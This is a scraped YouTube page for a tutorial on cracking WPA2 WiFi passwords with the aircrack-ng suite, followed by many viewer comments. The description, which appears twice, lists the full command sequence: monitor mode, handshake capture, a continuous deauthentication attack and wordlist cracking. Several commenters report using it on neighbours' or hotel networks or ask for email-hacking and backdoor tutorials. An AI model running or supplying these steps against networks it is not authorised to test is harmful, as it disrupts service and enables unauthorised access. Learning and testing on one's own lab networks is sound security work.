Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: amzn.to/3qbQGKN Alfa AWUSO36NH: amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: ua-cam.com/video/VAMP8DqSDjg/v-deo.html WPA2 GPU password cracking: ua-cam.com/video/J8A8rKFZW-M/v-deo.html Wordlists (rockyou): ua-cam.com/video/rgWcguAg-XA/v-deo.html ================ Connect with me: ================ Discord: discord.com/invite/usKSyzb Twitter: twitter.com/davidbombal Instagram: instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal UA-cam: ua-cam.com/users/davidbombal ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): bit.ly/yt999ccna Udemy CCNA Course: bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks
your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught
Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy
@@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?
I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ? Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...
Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.
After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥
Just if somebody is having issues with VM, I was not able to find any SSIDs until I changed my VM network configuration. I changed to Bridge and it worked. I am still new on this and I will keep doing research. Thanks David for all the good work here!
hey your comment is 2 years old i did what you said but i still don't see any ssids should i set the Promiscuous Mode to Allow VMs vs Allow All? please help
I must say that you are indeed an excellent teacher. You did not explain what to do after I have the HANDSHAKE I'll be glad to hear from you. Thank you very much.
I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy Thank You Sir Mad Respect 🙏🏼
Such a clear and well communicated lesson definitely will be watching more of your videos and looking at your courses, thank you for this great lesson David!
Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.
yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system
Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.
Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.
My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.
Can you please help me? Iam in the same situation as you with a rtl8723be that let's me get it into monitor mode and all.. I installed live Kali Linux on my USB drive and tried to crack wifi with it but ah I just cant get the password at the last moment.. it always shows "key not found" And most of the time I can't even get the Wpa handshake while doing the de-auth thing
2:50 "Here I have a TP-link router, which I've purchased" Yes, Mr Bombal, we believe you! That's my way of hacking WiFis by stealing the whole network adapter 😂
Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!
i tested this thing when i was in school on my second router information wasn't available like that at that time it was my passion to learn new stuff but now life has changed so much I don't even have the time to play games or watch tv
lesson of the day "The best way to predict the future is to create it." Thanks a lot for creating this video i really enjoyed watching it and yeah you have a new subscriber.
Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.
Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)
its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue
@@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?
Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you. I thought I wouldn't find videos like this in UA-cam jajaja.
Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept
Hi David, Easy to follow your steps. But how to go about if the AP (WPA2 CCMP PSK) does not bring out a EAPoL? Do I just have to try to go with Hashcat instead? This would eliminate Wireshark as well? Thank You Georg
A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!
Hi David, you seem to be a cut above the other UA-cam presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...
When you mentioned ‘decrypting’ or ‘hacking’ the password, I believe you meant ‘cracking the hash.’ Hashes are not encrypted data; they are the result of a hashing function. In the context of capturing a Wi-Fi hash, the correct term is ‘crack the hash’ correct? love your videos.
Hi, If you capture more than 1 handshake, let's say you capture 9 handshakes, how can you reduce the number of handshakes in the cap file to make the cracking less redundant?
You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.
Hi David, great stuff as always. One question - when we deauth a device (phone), will that device try to connect to the access point by itself or we must manually connect it to the access point?
Good video but I think this is still brute forcing and will not work against a good password. I think the most effective attack on WPA2 is Fluxion and I wish David would demonstrate Fluxion so people will recognise it and not fall for it (like I did)
After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.
When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode. Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.
this helped me find so many flaws in my network setup. THANK YOU for this educational video, this kind of attack is very common in my area and I can now make it difficult for CTRL+V script kids to scan/connect my network.
TIP: If you have a Raspberry Pi, connected over ethernet, running Kali, you can put the internal Wifi chip into monitor mode, you don't have to buy an external adapter unless you want to do MITM and stuff
Excellent video David. Out of curiosity how did you get your terminal prompt to look so beautiful. Mine looks sooo plain... Can you please share the secret? 🙏👍👌
Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)
ada banyak masalah sebenarnya menggunakan aircrack-ng tapi slama saya ini aircrack sangat efektif dibanding yang lain..itu tergantung anda membuat daftar sandi dan perangkat yang anda pakai..dan terkahir seberapa kuat anda mengoprasikan aircrack..the best tools
Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.
i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.
I will never think in attacking any network bu mine, pinky promess... keep creating awesome content! my (neigh..) own wifi network needs to be cracked!
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: Sorry, try again. Password: Sorry, try again. Password: Sorry, try again. sudo: 3 incorrect password attempts
Is WPA3 or 5 GHz vulnerable also to this or easily cracked some other way? Also how can I use Wireshark to monitor for deauthentication packets and log them? Also is there any security software that would alert me if a deauthentication packet is sent so I might have time to change the password? Of course I am not sure if there is anything for the last one at least if there is I wouldn't expect it to be free. These questions (the ones that apply of course) are assuming that I can monitor and one of my old laptops I think has a card that can do it. All things mentioned are for my own network BTW. I found your video to be very well done.
nice video but lots of the time, the password used by people is the default password under the internet box. I reckon it's more difficult to crack than a "hello hello" password... What do you think?
Menu:
Use airmon-ng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmon-ng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodump-ng: 5:15
Use airodump-ng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodump-ng capture WPA2 four way handshake: 6:58
Use aireplay-ng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrack-ng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40
================
Network Adapters:
================
Alfa AWUS036NHA: amzn.to/3qbQGKN
Alfa AWUSO36NH: amzn.to/3moeQiI
================
Commands used:
================
! See version of Kali
cat /etc/os-release
uname -a
! See interfaces
ip addr
iwconfig
!kill processes
sudo airmon-ng check kill
!Start monitor mode
sudo airmon-ng start wlan0
!Verify that monitor mode is used
sudo airmon-ng
!You could also use iwconfig to check that interface is in monitor mode:
iwconfig
! Get the AP's MAC address and channel
sudo airodump-ng wlan0mon
! AP-MAC & channel - you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2
!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
!2nd Window - deauth attack
!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
!Use Wireshark to open hack file
wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol
!Stop monitor mode
airmon-ng stop wlan0mon
!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
================
Previous videos:
================
Kali Installation: ua-cam.com/video/VAMP8DqSDjg/v-deo.html
WPA2 GPU password cracking: ua-cam.com/video/J8A8rKFZW-M/v-deo.html
Wordlists (rockyou): ua-cam.com/video/rgWcguAg-XA/v-deo.html
================
Connect with me:
================
Discord: discord.com/invite/usKSyzb
Twitter: twitter.com/davidbombal
Instagram: instagram.com/davidbombal
LinkedIn: www.linkedin.com/in/davidbombal
Facebook: facebook.com/davidbombal.co
TikTok: tiktok.com/@davidbombal
UA-cam: ua-cam.com/users/davidbombal
================
Support me:
================
Buy my CCNA course and support me:
DavidBombal.com: CCNA ($10): bit.ly/yt999ccna
Udemy CCNA Course: bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10
======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks
please hack my neighbors wifi
your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught
Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy
@@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?
I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output
I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ?
Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...
Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.
We all heard you. God bless you my friend.
After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥
Does WiFi hacking damage the phone's battery?
Is there a virus that can damage the battery through Wi-Fi?
Just if somebody is having issues with VM, I was not able to find any SSIDs until I changed my VM network configuration. I changed to Bridge and it worked. I am still new on this and I will keep doing research. Thanks David for all the good work here!
hey your comment is 2 years old i did what you said but i still don't see any ssids should i set the Promiscuous Mode to Allow VMs vs Allow All? please help
I am 56 and you make this all so interesting and easy. I love what you do and cant thank you enough for educating me.
Ah, finally, I found a proper way to learn about network security.
David: only attack networks that *you own*
Me: well, i basically "own" the network after im in- *gets sent to gulag*
Lol🤣🤣
LOOOOL BWAHAHAH
hahaha
loled so hard, because I understand.
I must say that you are indeed an excellent teacher.
You did not explain what to do after I have the HANDSHAKE
I'll be glad to hear from you.
Thank you very much.
He said you can crack it
Just look it up.
I followed a lot of tutorials but none worked but this worked for me thanks men i appreciate it ❤❤
This for me is the best presented shows on YT its given me so much pleasure and being retired keeps me busy lerning thank you sir.
I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy
Thank You Sir Mad Respect 🙏🏼
He teaches on Udemy too, amazing teacher. courses are free on youtube but for people that can afford they can support him on Udemy
u b naija boss man
Such a clear and well communicated lesson definitely will be watching more of your videos and looking at your courses, thank you for this great lesson David!
Thank you Bryce!
hi please make a full video about evil twin attack
@@davidbombal
backtrack was my introduction to Linux / cybersecurity back in 2008. So glad that I kept digging at it, best decision ever
You are my favorite. You talk so clearly and demonstrate in clean way.
Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.
yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system
@@user-vk2cd9qw7i or in the case of Gitlab using it on the wrong system
Such a great format, you make it seem so simple ❤️👍
hello
@@pasihiltunen4041 hi
Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.
You got it!!
Brilliantly made video as we've all come to expect from you, David.
Really invigorates the motivation to keep at it.
Keep it up!
Thank you!
@@davidbombal sir plz make video on how to create backdoor through wifi🙏
@@Manishkumar-dj6kl that's sound mighty like malicious intent
it requires a huge practical knowledge and consistent practice to be like u :)
Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.
idk why but after doing airodump-ng i dont discover any wifi
Hey, try airmon-ng check kill
Make sure your network adapter supports monitor mode and packet injection.
@@khalidnoor2556btw did you figure it out? cos even I'm facing the same issue here
@@SilverWolf-rz4bqdid u figure out
My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.
Can you please help me? Iam in the same situation as you with a rtl8723be that let's me get it into monitor mode and all.. I installed live Kali Linux on my USB drive and tried to crack wifi with it but ah I just cant get the password at the last moment.. it always shows "key not found"
And most of the time I can't even get the Wpa handshake while doing the de-auth thing
2:50 "Here I have a TP-link router, which I've purchased" Yes, Mr Bombal, we believe you!
That's my way of hacking WiFis by stealing the whole network adapter 😂
lol... great comment. Yes, easier to just take the whole device. Got to demonstrate that I'm using my own devices so I don't get into trouble.
LOL
@@davidbombal I am a beginner but I want to study Ethical hacking please anyone help me what to learn and from where????
For the routers o módems Tp link and Belkin is easy to hack ? Mr Bombal ? In Windows is posible ? Or only in kali Linux ?
@@mariab0209 esc que je alle a toulitet
nice , 8 hours and 40 minute time left. great tutorial
while(True):
print("David sir is great")
True
David sir is great
Infinite compliments once one bro!🔥
Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!
wpa handshake never get captured :(
"I have to say this or I get into trouble"
God that really got me, subscribed
i tested this thing when i was in school on my second router information wasn't available like that at that time it was my passion to learn new stuff but now life has changed so much I don't even have the time to play games or watch tv
lesson of the day "The best way to predict the future is to create it."
Thanks a lot for creating this video i really enjoyed watching it and yeah you have a new subscriber.
Bruh you just copied another comment!
Do u really think all the people are here for education purpose 😂🗿
Nah hes using it as a excuse.
Yep it's just for educational purposes😊
😊😏😎
😂😂😂
I am
I think I just found a gem YT channel, thanks David for being an amazing guide.
Glad you enjoyed the video!
David, you have been killing it with hacking videos! Thank you Sir, you're a great teacher !
Thank you Andrew!
I get get locked up for it yet he gets a fucking superstardom even gets paid for it the fucking irony.
@@peterbefreebrothasandsista2465 because he’s not using it as a black hat hacker that’s why.
Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.
@@davidbombal what's the attack name and the protocol used ??????
I'm a bit late to this party, but thank you for the clear instructions in this video! In what video did you use a GPU to crack a non-listed password?
respectfully, search it up
Do you have classes? I'm grown but if my parents ever asked me who i wanted to be like when i grew up, i would say: David Bombal LOL
Hahahaha nice
Yes he does
I will say the same. He is my role model
Network Chuck
@@RandomVideosN.S.WAustralia yes he n Zaid Sabith ( Ireland) are great too.
I know many people have told you What I am about to tell you.
You are the best!👍😎
Nice video Mr.David You are The Best Keep Going 👏👏👏👏👏
Thank you. I really appreciate that :)
Thank you, very straight forward. I like that. You talk about the vital things without nonsens. That is a real pro.
Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)
its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue
@@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?
@@harvindersingh4411 its not broken thats how virtual machines work. if you want wireless in a virtual desktop it needs to be usb.
@@mobiousenigma So that means I can't use the internal adapter as a wireless network in virtual box?
@@harvindersingh4411 dual boot
Thanks for the tutorial. Been using my neighbor's wifi for 3 months now. It only took my Pi 30 minutes to crack the password 👍👍
That wordlist only really works if you live in a country where english is the main language though it seems
Damn you're really fucking smart you think of that on your own??
What should you use if english isnt the main language
Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you.
I thought I wouldn't find videos like this in UA-cam jajaja.
Very well explained. I'm starting in cybersecurity thanks to you! :)
Thank you Joel. That's fantastic!
hey thank u but there is a problem when I type sudo airman-ng its still on wlan0 not wlan0mon why???
Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept
Hi David,
Easy to follow your steps. But how to go about if the AP (WPA2 CCMP PSK) does not bring out a EAPoL?
Do I just have to try to go with Hashcat instead? This would eliminate Wireshark as well?
Thank You Georg
Loved it! It's 5:30 in the morning and I had a great time doing this:)
Great! Now I can mess with- uh I mean “demonstrate” my new skills to my friends!
A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!
Keep it coming!!!! But please update your Udemy course with these Videos 😁
10:26 xD ah i remember now why I abandon this xD the brute force part.
Hi David, you seem to be a cut above the other UA-cam presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...
When you mentioned ‘decrypting’ or ‘hacking’ the password, I believe you meant ‘cracking the hash.’ Hashes are not encrypted data; they are the result of a hashing function. In the context of capturing a Wi-Fi hash, the correct term is ‘crack the hash’ correct? love your videos.
Good Content Mr.David 👏👏👏👏👏👏
Thank you
this is by far the best tutorial and demonstration of airmon/aircrack.
Hi,
If you capture more than 1 handshake, let's say you capture 9 handshakes, how can you reduce the number of handshakes in the cap file to make the cracking less redundant?
did you resolve this? i tried two cap files first one said denied access, cap2 file works
@@jeramiahclark9826hey why isn't airodump-ng showing any bssid?
How can I solve this problem?
just happen to have a TPLink WN722 layin around and doing test on my own network. tutorial works great. thank you
hey david... although i did all the steps correctly after the deauthentication i dont get a wpa handshake
.. pls help me through this
Same here bro didn't get the wpa handshake
You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.
@@msubhietamam5720 ok got your point.
You make me to dive into again.
@@happygujjar7254 happy cracking then! 😊
thank you David! I just subbed, great videos! Much love from pentesting enthusiasts in India :D
Hola.
Te quería agradecer por tu gran conocimiento aportado, me ha sido de mucha utilidad para manejar este sistema.
Cuidate y gracias ☺️👍
Hi David, great stuff as always. One question - when we deauth a device (phone), will that device try to connect to the access point by itself or we must manually connect it to the access point?
it will try to connect by itself
Good video but I think this is still brute forcing and will not work against a good password.
I think the most effective attack on WPA2 is Fluxion and I wish David would demonstrate Fluxion so people will recognise it and not fall for it (like I did)
Agree all wifi passwords are nonstandard out of the box e.g. e7xjedhjd
After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.
Mil gracias amigo los subtitulos traducidos funcionan perfectamente y se te entiende muy bien.
What camera and lighting do you use for your video presentations? It all looks very good.
When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode.
Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.
did you find the solution to the problem? i have tl-wn725n, and i can't start wlan0mon :(
AMAZINGLY well put together, researched and shown. This helped me with a CTF I was doing.
This
Nothing is working for me 😞
Me too
What's is the problem?
@@Mr.X-xyz My laptop logout automatically and the network which i connected is automatically disconnected
I just saw this video and right away had to subscribe, absolute wonderful!! you make it look so simple, thank you so very much!
Not me getting a cancer ad before trying to hack my neighbors Wi-Fi
😭😭😭
this helped me find so many flaws in my network setup. THANK YOU for this educational video, this kind of attack is very common in my area and I can now make it difficult for CTRL+V script kids to scan/connect my network.
Love your videos, very informative :) Question: I run my Kali on Parallels on a M1 Macbook. Would the adapters work for me?
TIP: If you have a Raspberry Pi, connected over ethernet, running Kali, you can put the internal Wifi chip into monitor mode, you don't have to buy an external adapter unless you want to do MITM and stuff
Clear tutorial, you gained a sub. Unsure why 318 folk disliked this
Well thanks to your tuto I've changed my Hotel GUEST wifi 1MB/s to Admin's WiFi with full speed
You have good contents as always... Always you are complete with the topic which you are streaming
Excellent video David. Out of curiosity how did you get your terminal prompt to look so beautiful. Mine looks sooo plain... Can you please share the secret? 🙏👍👌
Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)
ada banyak masalah sebenarnya menggunakan aircrack-ng tapi slama saya ini aircrack sangat efektif dibanding yang lain..itu tergantung anda membuat daftar sandi dan perangkat yang anda pakai..dan terkahir seberapa kuat anda mengoprasikan aircrack..the best tools
Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.
Subscriber : How many your ROUTER?
David : Yes
i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.
Thanks sir for the information you explain each and every command which makes it easier to understand......
Love from India!
“Someone has arrived.”
david : just for educational purpose
me: keep deauthing neighbors wifi
I will never think in attacking any network bu mine, pinky promess... keep creating awesome content! my (neigh..) own wifi network needs to be cracked!
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts
Valuable info! I can test my password conventions against a commonly used wordlist which is most apt to be used against me. Thanks!
wonderful good work and very informative video on wifi cracking than other youtubers
Did this in college! Very good demo :)
3:12 everyone is not here for education purpose ❤
😂
Hi David, please on your vmware configuration, did you use NAT or Bridged network to work with the adapter...thanks... I'll appreciate a response
Amazing! I'm new in learning ethical hacking, your videos are very helpful!
pentesting seems cool asf
